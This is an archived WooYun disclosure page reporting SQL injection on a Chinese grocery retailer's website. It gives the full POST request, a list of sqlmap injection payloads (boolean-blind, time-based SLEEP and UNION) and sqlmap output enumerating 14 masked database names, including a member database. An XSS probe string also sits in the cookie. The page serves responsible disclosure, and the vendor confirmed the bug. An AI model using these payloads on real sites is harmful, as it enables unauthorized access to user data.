当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0164344

漏洞标题:春播3W站SQL注入(14库 涉及15W用户信息)

相关厂商:北京春播科技有限公司

漏洞作者: 天地不仁 以万物为刍狗

提交时间:2015-12-25 12:33

修复时间:2016-02-07 17:56

公开时间:2016-02-07 17:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-25: 细节已通知厂商并且等待厂商处理中
2015-12-25: 厂商已经确认,细节仅向厂商公开
2016-01-04: 细节向核心白帽子及相关领域专家公开
2016-01-14: 细节向普通白帽子公开
2016-01-24: 细节向实习白帽子公开
2016-02-07: 细节向公众公开

简要描述:

圣诞节到了···有礼物不?

详细说明:

POST数据包:

POST /Category/getBrotherCategoryListByPid HTTP/1.1
X-Forwarded-For: 8.8.8.8'
Content-Length: 53
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.chunbo.com:80/
Cookie: PHPSESSID=b7g95km28gmlkuuj1ifumi2av6; cb_site_id=1; cb_site_name=%E5%8C%97%E4%BA%AC; cb_is_reg_info=1; _pk_ref.1151.b7bb=%5B%22%22%2C%22%22%2C1450954569%2C%22http%3A%2F%2Fwww.acunetix-referrer.com%2Fjavascript%3AdomxssExecutionSink(0%2C%5C%22'%5C%5C%5C%22%3E%3Cxsstag%3E()refdxss%5C%22)%22%5D; _pk_id.1151.b7bb=5ffe0accbe4f2f4e.1450954569.1.1450954569.1450954569.; _pk_ses.1151.b7bb=*
Host: www.chunbo.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
pid=188&site_id=1


pid 参数 和 site_id 参数 均可注入

0.png


1.png


其中 memberdb 是存储用户信息的

2.png


看了下字段

3.png


漏洞证明:

POST parameter 'site_id' is vulnerable. Do you want to keep testing the others (
if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 52 HTTP(s) re
quests:
---
Parameter: pid (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pid=188) AND 6610=6610 AND (6333=6333&site_id=1
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: pid=188) AND (SELECT * FROM (SELECT(SLEEP(5)))SSlX) AND (8244=8244&
site_id=1
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: pid=188) UNION ALL SELECT CONCAT(0x7162767a71,0x4a476f735370726c4a5
7,0x7176767a71),NULL,NULL-- &site_id=1
Parameter: site_id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pid=188&site_id=1 AND 2328=2328
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: pid=188&site_id=1 UNION ALL SELECT NULL,CONCAT(0x7162767a71,0x6d635
64b494a6374424f,0x7176767a71),NULL--
---
there were multiple injection points, please select the one to use for following
 injections:
[0] place: POST, parameter: pid, type: Unescaped numeric (default)
[1] place: POST, parameter: site_id, type: Unescaped numeric
[q] Quit
> 0
[18:59:50] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.29, PHP 5.5.30
back-end DBMS: MySQL 5.0.12
[18:59:50] [INFO] fetching database names
available databases [14]:


mask 区域


*****dmi*****
*****alog*****
*****msd*****
*****onf*****
*****kboo*****
*****ron*****
*****ron*****
*****tion_s*****
*****fore*****
*****emb*****
*****miss*****
*****moti*****
*****evi*****
***** t*****







[18:59:50] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\www.chunbo.com'

修复方案:

版权声明:转载请注明来源 天地不仁 以万物为刍狗@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-12-25 13:47

厂商回复:

谢谢。

最新状态:

暂无